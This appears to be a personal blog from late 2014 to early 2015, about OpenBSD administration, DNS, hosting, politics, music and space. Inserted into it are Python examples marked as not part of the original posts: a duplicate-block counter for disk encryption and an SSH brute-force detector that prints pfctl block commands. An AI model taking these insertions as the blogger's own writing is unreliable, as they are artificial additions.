The above picture is from my office (it's a poster) showing Venus on the left and Earth on the right. This is all the media I can give you. Let your imagination do the rest. Also for a small hint: trees breathe carbon dioxide which Venus has plenty of. A floating base on Venus could perhaps have a few trees for rare treats. Venusian cherries anyone?



Merry Christmas / Frohe Weihnachten!

December 24th, 2014

Tonight is Christmas Eve. Merry Christmas! It looks like it'll be a green Christmas here in Germany, as long as it doesn't rain, it'll be alright.



Winter Flowers

December 28th, 2014



Added supercluster to nameservers

December 29th, 2014

On August 12th, 2014 I removed moon.virgostar.net from the nameservers. Since then I had been running off only two nameservers. Both were spread far apart in Panama and Germany. Since today I have added a third nameserver again, this time it's called supercluster.virgostar.net. While doing so I noticed (thanks to DENIC) that my delphinusdnsd and its predecessor wildcarddnsd version 0.9.0 mismatched/flipped the refresh and retry values in the SOA of a zone. I fixed that and put it back in production. Supercluster is running nsd in a slave mode. Earlier before doing the DNS change I upgraded supercluster to OpenBSD 5.6 and applied all known patches. It's been a busy morning and I'm fairly tired. So looking at the winter flowers will get me going again, I hope.



Happy New Year!

December 31st, 2014

It's New Years eve here in .de, but on the globe the date is already January 1st (in .au for example). May 2015 be a prosperous year for you and me. Signing off for 2014, yours Peter J. Philipp.



Donation time again

January 5th, 2015

I have written a bank transfer to OpenBSD for 50 euros, labelled it "1st quarter", so it may be that OpenBSD is getting similar amounts three more times this year. Told you it'd be less than last year.



My 150 Euro Calculator

January 5th, 2015

You know I own a Raspberry Pi. Well in December of 2014 I bought an Adafruit TFT with touchscreen (only with a pen) that is 2.7". Here are the costs involved:

  • Raspberry Pi - 70 euros with SD card and power supply.
  • Adafruit TFT display and Case - 50 euros.
  • Shipping and Customs from NYC, USA - ~30 euros.
I installed xdm and modified it to run calculator (xcalc) over the entire screen. It has a screensaver too. This is what it looks like:

I put an OpenBSD sticker on it but only to cover the holes for the buttons which I need to buy the buttons for but not likely since customs costs so much. This rpi is running raspbian OS. One day I'm going to overhaul this calculator but for now it's working nicely.



Ordered 3 books

January 9th, 2015

I have ordered a book titled "The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory". This is something that interests me and that I'm a total newbie in. With this purchase was a recommendation to buy 3 books so I got the Red Team Field Manual along with Practical Reverse Engineering. I wonder if it was a good decision. Since my budget for this year is only 6-8 books I'm only going to count this as 2 books instead of 3.



I am not your subordinate

January 11th, 2015

The longer I observe the International news in regards to views from other countries with their relationship to Germany, I just want to make it clear. I'm not your subordinate. Other countries waged war versus Germany 70 years ago and we lost. However we're not born to be subordinates generations after the war, so treat us as sovereigns. If you do not you lose a friend. And friends are what everyone needs in these times. I sense that it makes Russians furious that Germans are able to share their opinions on the world wide web or even the Internet. I sense that Americans feel they have to protect a secret when it comes to exchanging valid information. I'm not your little friend and I'm not your big enemy. I am sovereign and seek freedom with something else. I'm annoyed that Mr. Gorbachev is blaming Germany for the problems his country has with Ukraine. But my stance is, let the Ukrainians decide their own fate. All the power-struggles of Russia are immature and protrude insecurity world wide. Get real!



And our rights diminish...

January 13th, 2015

I'm unsure whether it should be "thanks charlie" or "merci charlie". As there are now tougher laws, tougher controls and tougher everything-that-takes-my-freedoms. Even in England they are considering outlawing strong crypto. I guess we may as well start paying a tax to organized crime immediately since they can just read through the crypto that's weakened. Good thought! How free and creative!



Purchased some Reggae

January 15th, 2015

In order to chill out and have something new to listen to I purchased some Reggae. The lucky artist I picked this time is Khago - The Real One (album). These 10 songs join my collection of reggae now.



This is how fair the world is

January 19th, 2015

1% > 99%. After the collapse of nations which is looming I predict people will want to do something different, if we still have a chance.



Is it more than Space Junk?

January 24th, 2015

I read somewhere that companies want to put their own satellites into space to connect the remaining 40% of Internet-illiterates. Google, SpaceX and Virgin Galactic I think. They dream of satellite formations that envelop the world and are able to give Internet in far remote corners where laying fibre-optic cabling is too expensive. I personally would tell these companies to "stand back" and hold that thought. If everyone does their own "Iridium constellation" then we'll have a major problem with space junk. What we need is 1 platform for everyone to keep it sane. So I hope these companies will "network" in the form of humans talking together and planning together instead of competing and making a mess of the space that surrounds us.

I would bet that if we put reflectors or laser optic communication devices on the moon that people would control and talk to from earth that the problem would solve itself. The moon is seen by pretty much everybody on earth but not always. So you can set up a communications link to give people a "downtime" to think, dream, plan and improve their methods of communicating with the moon and each other. In my view this is much more reliable and constructive than leaving space junk in orbit around earth. I've noticed that I think differently when I'm online. I compulse more, I don't use my imagination as well as I do when I've spent time away from the net. Some examples are a long train journey (clickety clackety) or even being in the closed ward of a psychiatric institution.

In the end perhaps I wanted to put a thought out there when I had moon.virgostar.net on a Hong Kong VPS. In my view it's all about the moon, not earth orbit.



Administrivia

January 24th, 2015

I just noticed the dates were wrong for January's articles. I forgot to increment the year from 2014 to 2015 in my template script that I use to write the articles with. It should be fixed now. Sorry.



Cryptowars: Organised Crime and Terrorists

January 26th, 2015

I have had this on my mind for a long time now. Terrorists cause laws to be put in place to weaken crypto, or attempted laws. This falls into the hands of Organized Crime who control corporations who provide Internet. At the point when innocents join a provider that is corrupt their crypto can be read and placed on the Organized Crime black market. Now, the problem with this is who is a greater enemy to government? Organized Crime or Terrorists? Please don't tell me OC doesn't exist. AFAIK in Canada there have been identified six groups of Organized Crime and many are multinational meaning that Germany too has at least some of these groups.

Let's look at Organised Crime further, if these people were in power we'd have:

  • Disappearances (people being eradicated from life)
  • Shadow Governments (think of a place where OC runs a region)
  • Elitism (only those with an edge on technology reign)
  • Stronger crime syndicates (more money will remain in the underground economy)
  • Less taxes, less common taxpayers money
  • Bribes on government would pick up
If that doesn't scare the bejeezus out of you but terrorists do, then you should reevaluate life on this world. This is why I'm for strong crypto that, yes, even our government can't break. Perhaps we should prepare ourselves mentally to allow terrorist attacks and work politically to prevent them instead of judicially. I know OC is a bigger beast than terrorism and if we don't get it in check it will cost us a lot more than terrorism ever will.



Electricity (day) consumption up (unfortunately)

January 27th, 2015

I got my electricity bill today. Something really weird is going on because I spent less electricity for heating (night electricity which charges up my electric furnaces) but more for day electricity. In a little HTML table it would look like this:
| Year | Night | Day | Total |
|---|---|---|---|
| 2013 | 6941 | 1276 | 8217 |
| 2014 | 6906 | 1323 | 8229 |

It could be one of two new computers, one of which is only on at days. It could be freifunk usage only during the days but not at nights, and it could be that I use my network which is doubly encrypted only during the days mostly. I'll be curious what 2015 will be like. It will likely go a little higher too.



Purchased some Reggae

January 28th, 2015

I have the winter blues. I decided it's worth it to spend another 8 euros for reggae. I have purchased Delly Ranx's The Next Chapter. I'll be busy listening now.



The rich can't buy smarts, can they?

January 28th, 2015

I think they can. Artificial Intelligence, once it's on the market the rich will be not just rich but also super smart. Because they can put full trust into AI, to make them richer. So the monopoly that peasants have over them on the Internet... well the days are numbered for that. Just my thoughts.



I want a Greek bailout

February 2nd, 2015

While I don't think it's fair that Greeks mismanaged their money, I feel they are Europeans like us and we should help them. It's a known fact that the south of the EU cannot produce economically like the north. So for European unity I believe a solidarity tax with the southern countries would be a proper thing. We want to be on a flat and even playing field in all of Europe but industry in the north is way beyond the infrastructure that the south has. Everyone would pay into this tax, all Europeans, but it goes back to the south. So in effect it means the north is working for the south, yes. But that's the price of unity we have to pay, perhaps the south can repay us in other ways.



Why I think "The Time Machine" doesn't work in reality

February 3rd, 2015

If you've seen the movie "The Time Machine" you may recall how he sat on a chair and the time machine moved through time linearly. This would work if the earth was the center of the universe and didn't move in space and time. However our earth follows the "solar apex" which means it's pulled along the sun at some speeds in the direction of the star Vega. Also we rotate around the sun, also called orbiting. We complete one orbit in 365 days and a few hours. So if you were to go forward in time but not in space then we would miss the earth if you really think about it. Same with going backwards in time. So when building a time machine make sure you send astronauts out first with preferably a spaceship so they can come back to earth.



The last frontier, under the ice

February 5th, 2015

An old but new idea caught me last night. You probably heard of NEEMO which is NASA's underwater research station. Well consider NEEMO with a twist. It would be installed under the ice at the north pole of the planet earth. To do this I envisage a purely civilian project that uses old submarines converted with AIP fuel-cell propulsion. If you follow that AIP link it shows that this type of submarine can do 3000 nautical miles at 4 knots. Which is enough range to have a submarine go from Svalbard, Norway under the ice to the north pole and come back. The range between those two points is somewhere between 600 and 800 nautical miles (I haven't really done the math). The idea is to have a research outpost under the ice at the north pole and use nuclear fusion or just plain fuel-cells to produce electricity. Oxygen to breathe would be imported with supply submarines. Communications can be done with long wave radio as is common with submarines but the antenna is gonna be huge. There already is a research station over the ice at the south pole, this would complement its science but under the ice.



Thinking of voting Die Linke in 2017

February 5th, 2015

I've never voted that far left in my life. But the facts are the facts:

  • Rich are richer, poor are poorer, distribution is out of whack
  • Socialist parties like the SPD who are supposed to be center-left, aren't
  • Leftist parties like the Greens did not do enough when they were in power to stop the global inequity
  • Greece voted left so why can't I?
  • Perhaps there will be more money for me when I vote Die Linke so that I can pay into a pension fund
  • Right now I face no future, with no or little pension, I'll be poor when I retire
This is the grim reality. I've considered other parties and my past voting was Greens, Pirate Party and now Die Linke. Everything is not normal today, people are suffering and we need real change. For fairness.



Next Week marks Two Years in My Apartment

February 6th, 2015

Almost 2 years ago I moved in this place. Haven't regretted it yet, it's a wonderful place.



I'm sick

February 13th, 2015

These are the sickly days of winter. I came down with acute bronchitis since last weekend. I'm now on antibiotics and medicine that will hopefully help me develop the mucus and phlegm required to cough out this virus. Sorry for the graphic picture. I haven't been sick in a long time like this.



Upper Lower Class

February 14th, 2015

This impressed me very much. At Wikipedia under the American upper class article there is this chart of classes. Now while I live in Germany and I always felt like I was in the middle class, I work in North America and get paid in dollars. I also have a North American education of "some college". Many of our customers are US based, and I'm thinking where my place would be. Yes I'm in the Upper Lower Class. Lately this realisation has enthralled me. And it's made me a bit angry too. Dear world, I'm not OK with where you're going.



Moved the blog

February 16th, 2015

I have moved the blog away from my old vps's. This means it's a single point of failure too as only one server (in Amsterdam) is hosting the blog. This opens new avenues for me to eventually give up the Panama vps. The destinations americas.centroid.eu and emea.centroid.eu still go to the old vps's but I'm going to location tag them over soon.

The host it's now run on is powered by OpenBSD and is running OpenBSD's httpd, as you can see it's fairly successful at it. Please update your RSS if you were using it, as it may not work as before (you need to determine this).



Purchased more Reggae

February 17th, 2015

I don't just buy men artists, although the majority of Reggae I have is men. This album I just bought is from a woman. Etana - "I Rise". Looking forward to hearing the entire album.



Scarcity vs. Abundance

February 21st, 2015

Scarcity, what is it? It means that something (resources) is limited to an extent that it is scarce or little. What is Abundance? Abundance is the exact opposite. I remember the first time I heard the word abundance it was in a Bob Marley song and it went "In the abundance of water, the fool is thirsty". I heard the word scarcity after hearing use of abundance really. On earth we live a life of scarcity when it comes to "things". We may have a toaster and a tv, but we do not own a rocket or space shuttle to take us into orbit. Only a few people that are selected can go, "on behalf" of humanity.

I'd like to contrast scarcity with abundance in computer systems. My first computer I had (a ZX-81) had 4KB of RAM, it was really scarce. Compare that with my newest computer that has 32 GB of RAM, that's a factor of 8 million times what I had back then. I just hope that we don't get too disappointed that we don't see such factors of abundance in material things such as space shuttles.

I lived in North America for 15 years and in the early years I noticed a contrast that a lot more people had an air conditioning system with their house or apartment. In Germany there aren't as many systems but it has to do with scarcity of electric energy. It makes no sense to run a coal powerplant to run an air conditioner, my dad always said. The burned coal produces carbon dioxide which in turn causes the greenhouse effect aka global warming. If using green technologies such as wind turbines we're tapping into an abundance of energy on earth. Yet wind turbines aren't cheap and there is a scarcity of them.

In fact we're in energy transitioning times where we're going from unsustainable and falsely seemingly abundance of energy in form of nuclear to sustainable wind and solar. What nuclear energy has left us with is an abundance of poison in form of nuclear waste. 1 mg of it could kill thousands of people. So I'm gonna stop here on that topic.

As you can see we're living in mostly scarce times, except the computers... those buggers seem to double capacity every 18 months. But I can tell you we're hitting a limit even with computers. Right now we're having a heyday going smaller and smaller with chip circuitry, but we're nearing an end. I think they say 8 nanometers is the end of it. We're at 22 now I believe. We'll have to look for new ways of computing in order to keep up this seemingly abundance of capacity.

Oh well, that's all I wanted to say, although I'll continue when more comes to mind.



Ordered three books

February 23rd, 2015

I have ordered three books that generally interest me.

  • It's about Time: Understanding Einstein's Relativity - Mermin, N. David
  • Quantum Computer Science: An Introduction - Mermin, N. David
  • Quantum Computing verstehen: Grundlagen - Anwendungen - Perspektiven (Computational Intelligence) - Homeister, Matthias
Other than being about Quantum computers they don't really deal with computers much.



Nearing 20 years UNIX experience

February 24th, 2015

In 1995 I first installed GNU/Linux on my sole computer (a 486/66). A year later it ran FreeBSD 2.1-RELEASE, another year later in 1997 I got my first sysadmin job (starting pay $10/hour, soon after $36K a year). All in all I'm nearing 20 years experience as a UNIX user and 18 years experience as a UNIX sysadmin. It should really be UNIX-like although we did use Solaris in 1997 and BSD is not a clone. A lot has changed in those 20 years. For one I don't have the body I had back then. Back then I was slender and carried a Basketball. Now I carry the basketball in my stomach, lol :-). But I'm also wiser, I admit. And I'm getting smarter, I recently worked out how much raise I should be getting after inflation from what my salary was in 2000. If I had any advice for young people it is: "don't underestimate how much you're worth, make them pay" and "stay physically fit despite those long hours they want you to put in". Whether I'll be doing this another 20 years? Time will tell.



Got a washing machine

February 25th, 2015

Two years after moving into this apartment, I've finally got a washing machine. Picture here:

I used to take my laundry to my parents house but it's too much work now that my mother is home after having a stroke (she was in hospital for a few months), so I got this thing.



OpenBSD donations reached 397,000 dollars in 2014

February 26th, 2015

Ken Westerback of the OpenBSD Foundation has said this about 2014:

We received $397,000 in new donations and paid out $129,000 to support the activities of the OpenBSD and related projects.

And this year in 2015 they plan to raise $200,000. If you haven't donated yet please consider a small amount here or look up how to do donations otherwise.

I personally don't know if my money made it to the OpenBSD Foundation because I donate directly to Theo de Raadt's Munich bank account. So that money may be higher than $397,000. This year I decided to donate 50 euros quarterly and the first quarter is not up yet. But in a month it will be, I'll let you know when I do the second donation of the year.



God Speed Spock!

February 27th, 2015

         ##         ##
          ##       ##
           ##     ##
            ##   ##
             ## ##
              ###
               #
RIP Leonard Nimoy, 83.



Softraid Crypto seems secure

March 5th, 2015

Sometimes I do pesky things such as asking OpenBSD developers if their stuff is secure or not (or if they wrote certain parts). I do this in part out of curiosity and laziness at the same time. And so it came that I asked OpenBSD developers the following questions:

  • Why are there duplicate blocks in a crypto softraid disk image?
  • If it's because ECB mode is used would a counter mode be better?
Now Ted Unangst answered with some helpful answers. He understands code much better than I and his answers seemed very helpful.

Another developer Joel Sing answered but his answers didn't hit my satisfaction factor as much. In fact Joel wanted to make me work and overcome my laziness factor and he asked the following questions:

  1. What encryption algorithm/mode is used for disk block encryption?
  2. Where do the keys come from that are used for the disk block encryption/decryption?
  3. How are the keys that are used to encrypt the disk blocks stored?
  4. When creating a new softraid crypto volume, where does the key come from?
  5. What happens if you use a keydisk instead of a passphrase?
Now Joel knew that I had picked the function sr_crypto_encrypt() next to randomly because it was the closest looking function to having a crypto component. I guess I must have picked the wrong function. If ECB is not used for question #1 then perhaps it's AES XTS which is also mentioned in the code. I know very little about this mode and found only a little Wikipedia entry on it.

I'd like to rant about this a little more but I need to do more research. Spending 30 minutes reading /usr/src/sys/dev/softraid* and /usr/src/sbin/bioctl is not enough to make a concrete picture of this. And this isn't easy code either. I have much respect for Marco Peereboom and Joel Sing and others who wrote this for their perseverance in understanding such a complex thing. I'm just not at their level and likely never will be. Whether I was even helpful for anyone is debatable. But then again if no one looks and asks questions even if seemingly ignorant who is? I for one want OpenBSD tested and questioned in order to find what works best. If it didn't have that I wouldn't use it and I'd feel a lot more insecure. I'll give you another example, when W^X came out I was not satisfied with just them telling me that stack overflows are now protected. I wrote my own test programs to really test this to the extent of knowledge that I had on stack smashing. Had I not done this I would never have guessed that a program exits on SIGABRT when W^X detects a smashed stack.
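
An added example, not part of the original post and not OpenBSD code: a way to put a number on the duplicate-block question by counting repeated 16-byte blocks in an image, run here over constructed data. The keyed function `prf` is a hypothetical stand-in for a block cipher (HMAC-SHA256 truncated to 16 bytes, not AES), and the 512-byte sector size, key and sample plaintext are assumptions; the position-tweaked variant only models how a mode such as XTS mixes the sector number and block index into each block.

```python
import hashlib
import hmac
from collections import Counter

BLOCK = 16    # cipher block size in bytes (AES)
SECTOR = 512  # assumed sector size of the constructed image


def duplicate_blocks(image, block=BLOCK):
    """Number of blocks that repeat an earlier block (total minus distinct)."""
    counts = Counter(image[i:i + block]
                     for i in range(0, len(image) - block + 1, block))
    return sum(n - 1 for n in counts.values())


def expected_random_duplicates(n_blocks, block=BLOCK):
    """Birthday estimate of colliding pairs among n uniformly random blocks."""
    return n_blocks * (n_blocks - 1) / 2 / 2 ** (8 * block)


def prf(key, data):
    """Hypothetical stand-in for a block cipher: keyed, deterministic, 16 bytes
    out. It is not invertible and not AES; it only models 'same input, same
    output', which is the property that matters for duplicate counting."""
    return hmac.new(key, data, hashlib.sha256).digest()[:BLOCK]


def ecb_like(key, plaintext):
    """Each block is mapped on its own, independent of where it sits (ECB)."""
    return b"".join(prf(key, plaintext[i:i + BLOCK])
                    for i in range(0, len(plaintext), BLOCK))


def position_tweaked(key, plaintext):
    """Each block is mapped together with its sector number and its index
    inside the sector, modelling the tweak an XTS-style mode applies."""
    out = []
    for i in range(0, len(plaintext), BLOCK):
        sector, offset = divmod(i, SECTOR)
        tweak = sector.to_bytes(8, "little") + (offset // BLOCK).to_bytes(2, "little")
        out.append(prf(key, tweak + plaintext[i:i + BLOCK]))
    return b"".join(out)


# Constructed sample: four zero-filled sectors, one sector of repeated 'A'
# bytes, and 32 blocks that are all different from each other.
KEY = b"constructed demo key"
PLAINTEXT = (bytes(4 * SECTOR)
             + b"A" * SECTOR
             + b"".join(i.to_bytes(BLOCK, "big") for i in range(1, 33)))

if __name__ == "__main__":
    print("plaintext duplicates:      ", duplicate_blocks(PLAINTEXT))
    print("position-independent map:  ", duplicate_blocks(ecb_like(KEY, PLAINTEXT)))
    print("position-tweaked map:      ", duplicate_blocks(position_tweaked(KEY, PLAINTEXT)))
    # 2**36 blocks of 16 bytes is a 1 TiB volume.
    print("expected by chance (1 TiB):", expected_random_duplicates(2 ** 36))
```

A scan like this only reports that repeats exist, not why; parts of an image that never passed through the encryption layer are counted the same way.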



OpenBSD's httpd with webalizer

March 5th, 2015

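I like using webalizer to give me an idea how much international traffic I get with the GeoIP extension. Well when I switched to OpenBSD's httpd something was broken. It took me a few weeks to find time today and I figured out that the combined logfile prepends a %v (in Apache speak) which is a virtual hostname. I wrote a script to remove this (Apache recommends a program called split-logfile):

$ more webalizer.sh
#!/bin/sh
# Strip the leading virtual-host field that httpd prepends to each
# combined-format log line, then hand the result to webalizer.

TMPFILE=$(mktemp /tmp/blah.XXXXXX) || exit 1
# Drop everything up to and including the first space and leave the rest of
# the line untouched (awk '{$1=""}' would also collapse repeated spaces
# inside the request and user-agent fields).
sed -e 's/^[^ ]* //' /var/www/logs/access.log > "$TMPFILE"
cd somelocation && webalizer -w "$TMPFILE"
rm -f "$TMPFILE"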
Granted the USA and China are usually 1st and second place because of their aggressive search bots googlebot and baidu. How many people found this blog through a search engine? I hate to tell you your search engine is breaking the rules because I am maintaining a /robots.txt file which should exclude bots from going into my blog. I am not mad about you being here though just mad for being indexed.



Oldlaptop's github repo

March 5th, 2015

I had the opportunity to talk a little to oldlaptop on efnet. We talked a little about popcon.debian.org and noticed that openssh-client had >170K users at debian, and sed being the most popular package. Oldlaptop has a github page where he designs software and packages for UQM (/usr/games/uqm in OpenBSD). His github page is here. Thanks for chatting oldlaptop!



Purchased Reggae

March 7th, 2015

This month I got Luciano - Special Edition (2014).



Crackers are getting more careful

March 7th, 2015

Captured from an IRC session:

13:13 <@pbug> # grep 182.100.67 authlog | wc -l     
13:13 <@pbug>      543
13:13 <@pbug> # grep 182.100.67.112 authlog | wc -l 
13:13 <@pbug>       44
13:13 <@pbug> these pesky things!
13:14 <@pbug> they change their IP and continue trying to log in as root
13:15 <@pbug> oh what's more they are careful not to overload my pf tables now
13:15 <@pbug> # pfctl -t bad_hosts -T show | grep 182.100.67       
13:15 <@pbug> # 
Good thing I disabled root logins; they have been trying to crack it for a long time now while evading my overload pf tables.
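
An added example (not from the original post) of the check the IRC session does by hand with grep: failed root logins are grouped by /24, so a source that rotates addresses inside one network stands out even when each address stays below a per-host limit. The log lines are constructed and use documentation address ranges, the two limits are hypothetical, and only the `bad_hosts` table name comes from the post.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# sshd message for a rejected password, with or without "invalid user".
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) "
    r"from (\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def failures_by_network(lines, user="root", prefix=24):
    """Map each source network to a Counter of failed logins per host."""
    nets = defaultdict(Counter)
    for line in lines:
        match = FAILED.search(line)
        if match is None or match.group(1) != user:
            continue
        try:
            host = ipaddress.ip_address(match.group(2))
        except ValueError:  # octet out of range in a mangled line
            continue
        net = ipaddress.ip_network(f"{host}/{prefix}", strict=False)
        nets[net][host] += 1
    return nets


def distributed_sources(lines, per_host_limit, network_limit,
                        user="root", prefix=24):
    """Networks whose combined failures reach network_limit although no
    single host in them reaches per_host_limit.
    Returns (network, total failures, distinct hosts), busiest first."""
    hits = []
    for net, hosts in failures_by_network(lines, user, prefix).items():
        total = sum(hosts.values())
        if total >= network_limit and max(hosts.values()) < per_host_limit:
            hits.append((str(net), total, len(hosts)))
    return sorted(hits, key=lambda hit: (-hit[1], hit[0]))


def pf_commands(hits, table="bad_hosts"):
    """pfctl invocations that would add each flagged network to a pf table.
    Blocking a whole /24 is a judgement call; review before running."""
    return [f"pfctl -t {table} -T add {net}" for net, _total, _hosts in hits]


def _line(second, who, addr):
    """Build one constructed authlog line."""
    return (f"Mar  7 13:{second // 60:02d}:{second % 60:02d} gw sshd[4242]: "
            f"Failed password for {who} from {addr} port 50000 ssh2")


# Constructed sample log:
#  - six hosts in 192.0.2.0/24, four root failures each (24 in total)
#  - one noisy host in 198.51.100.0/24 with ten root failures
#  - two failures for a non-existent user, and one successful login
SAMPLE_LOG = (
    [_line(i, "root", f"192.0.2.{10 + i % 6}") for i in range(24)]
    + [_line(100 + i, "root", "198.51.100.7") for i in range(10)]
    + [_line(200 + i, "invalid user admin", "203.0.113.5") for i in range(2)]
    + ["Mar  7 13:05:00 gw sshd[4242]: Accepted publickey for alice "
       "from 192.0.2.10 port 50001 ssh2"]
)

if __name__ == "__main__":
    flagged = distributed_sources(SAMPLE_LOG, per_host_limit=5, network_limit=20)
    for net, total, hosts in flagged:
        print(f"{net}: {total} failed root logins from {hosts} hosts")
    for command in pf_commands(flagged):
        print(command)
```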



Equinox in 8 days

March 12th, 2015

The March Equinox is upon us again. If you're in Europe you're getting a rare treat at around 8:46 CET. We'll have a solar eclipse then, in parts of Germany the Sun will be covered around 70-80%. Some people are worried about solar power degrading and causing blackouts, we'll see. Only in the Faroes and Svalbard will there be a total solar eclipse, btw. So make plans to travel there now! LOL just kidding!



Wrote two members of parliament

March 12th, 2015

I have written two members of parliament representing Schweinfurt regarding the Stoererhaftung. I was prompted to write them according to this article, a call for help. I currently run the only known Schweinfurt nodes of Freifunk Franken, so this really does affect me not just indirectly.



Pre-Ordered OpenBSD 5.7

March 13th, 2015

Pre-orders are on. If you want to order OpenBSD 5.7 too and don't know how go to openbsdstore.com and click the flag at the top right to specify your region. The prices will then update and you'll be able to see 5.7 at the very top and proceed to buy it. Have fun!



Happy Pi day

March 14th, 2015

It's 3.14.15 as written in American (English too?) dates. This year the year also represents digits of Pi, so this year is special.



My Eclipse photos were a FAIL

March 21st, 2015

I made a construct with my iPod and welder's glass to capture the eclipse.

Unfortunately the images came out pretty bad. There are no lessons learned other than that it doesn't work this way. One suggestion was that I had to turn auto exposure off but I'm unsure of the setting on my iPod. Where others chose routes of perfection, I chose routes of failure it seems. Over and over again.



Purchases more Reggae

March 24th, 2015

In order to get by this March I have bought a rather old riddim (from 2013) called the "contagious riddim" which is various artists on the same track. I wouldn't know about this if it wasn't for pre-viewing on youtube, so props go to youtube too.



The catch-22 of mental illness

March 28th, 2015

Everyone heard of the Germanwings Flight 4U 9525 by now. The co-pilot caused a murder-suicide by crashing the plane deliberately. The evidence gathered amounts that he was mentally ill, but it wasn't depression. So did he hear voices? I.e. did he have schizophrenia? This is just a guess right now until the media reports the truth around his mental illness. So is it right to give up your job that you love because you have a mental illness? Is it right to hide it from your employer?

I have schizophrenia myself, but my employer knows this, but what if he didn't? Would that change a thing? In my view Andreas L. was reckless. He was a bull gone mad. He should have told his employer and taken the hit. It would have saved 149 innocents from dying. Truth is he would have lost his job, but there are other not-so-glamorous jobs that he could have taken on. And if he still wanted to kill himself he could have done it in a way that affects only himself. Like perhaps doing it in the glider he was solo'ing often.

More facts will appear in time, however, I'd also like to say this: "That guy made us mentally ill look bad, and is causing unneeded consequences on us!". We too are victims of this madman.



Please, not another LEO ISS!

March 29th, 2015

Russia's space agency and NASA may collaborate to create another ISS after the current ISS will be scuttled in 2024. Now if they want to do another LEO (Low Earth Orbit) ISS then I gotta yawn and say "boring!". How about raising the bar a little and putting a station around the moon? I'd even be satisfied with a station at Geosynchronous Earth Orbit (GEO). If Europe is expected to collaborate on another ISS I want them to consider this! Also the news of space junk and the evasive maneuvers that the current ISS had to do makes it literally dangerous to put another ISS in LEO.



R.I.P. Paul Schenkeveld

March 30th, 2015

News hit me that Paul Schenkeveld has passed away. This is sad news indeed. I ate at the same table as Paul at EuroBSDCon 2011 and noticed he was a great person. Later I watched some of his Youtube contributions regarding bhyve the BSD hypervisor. Also I enjoyed his interview of Will Backman at BSDCan (forgot year). Even though we hardly knew each other Paul, you will be missed. And I thank you for the help that you provided in all sorts of mediums. Rest in Peace.



ESA what are your plans?

March 31st, 2015

All space projects big and small required planning. And so it is that I am sitting here looking for the plans of ESA for future manned space flight. Why is it that I can't find anything? We know the ISS goes on to 2024, after which the Russians will decouple their part and create a new space station. America has plans to capture a boulder from an asteroid and make it a part of the moon. Also the Americans are working on a Mars mission. What is Europe doing?

When 2024 comes around are we going to hitch rides on the Russian space station? Or are we going to hitch rides with Americans? Or both? Why not make our own thing? The ISS didn't occur in 1998 without a plan. In fact if you research space station Freedom you'll see it's about as old as the Space Shuttle itself. Mir also existed but it was pressured to be given up in place for the ISS. Even project Apollo that put the first men on the moon required at least a decade planning. So we have 2015 now.. 2024 is in nine years. For me those nine years will likely go pretty quickly. Can ESA let us know their plans beyond 2024?



Astronomers detect giant star in Constellation Pisces

April 1st, 2015

A giant star was sighted by the Sternwarte Schweinfurt. They are unsure where it came from but it suddenly appeared, seen through the main refractor scope at the Sternwarte. For hobby enthusiasts who want to see this new giant star one should direct their scope at these coordinates: Right Ascension: 0:40:0.0 Declination 4:16:0.0. As this star has a giant red-shift (good opportunity to see this is at evening time) the coordinates could change, it is said.



Happy Easter

April 4th, 2015

I had a quiet but good easter friday, hope you did too.



Greece's war reparation demand

April 7th, 2015

Today Greece has uncovered the war reparations cost from World War 2 to Germany at 279 billion euros. Let's put this in perspective. The entire war reparations of World War 1 which led to World War 2, i.e. the Treaty of Versailles, asked Germany to pay 33 billion 1921 dollars. With inflation that would be 432.73 billion dollars today, which at today's exchange is 398.77 billion euros. So Greece's demand is over 70% of the demand by all Allies on Germany after World War 1. Personally as a German I'd like to pay, given the following demands:

  • We pay 1% per annum at 2.79 billion
  • We pay for 100 years at no interest
  • Greece enters a German-France-Greece military alliance within the EU

Somehow I think the Greeks would say yes to this. However try to convince the _other_ Germans that we should pay a cent, and they would not be willing. And then there is always risk for world war 3 because reparation demands are too high. History repeats itself, almost always. BTW the budget for 2013 was 302 billion euros in Germany. Do you think we can put 1% aside?



Wildcarddnsd 0.9.1

April 9th, 2015

I have just made public the 3 months old fix that fixes a mixup of SOA retry and refresh values. I have updated the CVS and made the tarball public at the Wildcarddnsd legacy page. This is likely the last fix before Delphinusdnsd 1.0.0 release in November. If you paid attention I have changed the name of the DNS server.



I have purchased another Riddim

April 10th, 2015

For April I have purchased the "Peace and Love" Riddim from various artists. Peace and Love to Reggae music!



Mac OS X 10.10.3 killed my screensaver!

April 11th, 2015

I upgraded my Apple Yosemite from 10.10.2 to 10.10.3 last night and this morning noticed that the sleeping monitor would not come back after I hit keys on the keyboard. So I thought the HDMI-DVI adapter broke and exchanged it with an HDMI cable to the monitor. Still the same behaviour though. I found an Apple support document that recommends just entering the password on the blank screen and the video would then come back. I'm gonna try this now, I'll let you know how it goes. BTW my Mac is a mac mini from late 2012. It has USB3 ports if that matters any.



Sorry no Linkedin, yet

April 11th, 2015

Someone invited me to Linkedin. Thanks! For now I wish to be independent though. When the time comes, when I need a Linkedin profile, I'll blog about it.



One year of mercury (computer)

April 13th, 2015

On April 22nd, 2014 I received the ordered system which was custom built at a computer shop. The computer is mostly off at nights and weekends and when it runs it's fairly bored. For the type of work I do I need mostly a mail client, a browser and ssh, all of which don't put so much load on this system. Yes a web browser could in theory use up a lot of resources but the types of websites I use for work don't do that. This year I plan on repurposing this machine, possibly in November/December, to become a bhyve hosting system. I'll need another system replacing it though. Right now I have my sights set on a mac book or MBP that I'll use with a docking system to become my workstation. The mac mini (gaia) may see another repurpose as well, I'm hoping to put OpenBSD on it natively. Not sure if I can do that yet, but the usb3 support in OpenBSD seems promising.



Blog Outage this Morning

April 15th, 2015

There was a power related issue at the datacenter of my VPS provider in the Netherlands. This caused centroid.eu to be unreachable for a number of hours. Now you know :-(.



The contraction of my VPS network

April 15th, 2015

At one point in time I had three global VPS's rented. One was in Hong Kong, the other in Panama and a third in Nuremberg, Germany. Now I have replaced the Hong Kong VPS with an Amsterdam VPS, and I'll likely replace the Panama VPS with a new Frankfurt VPS hosted at Digital Ocean. As long as I can use FreeBSD there, that is. What this means is that there is a contraction happening. I'm contracting back into Europe from a worldwide presence. I still have to think about why I'm doing this but it's reactionary to outside influences.



Backport of patch for OpenSMTPD 5.4.2p1

April 20th, 2015

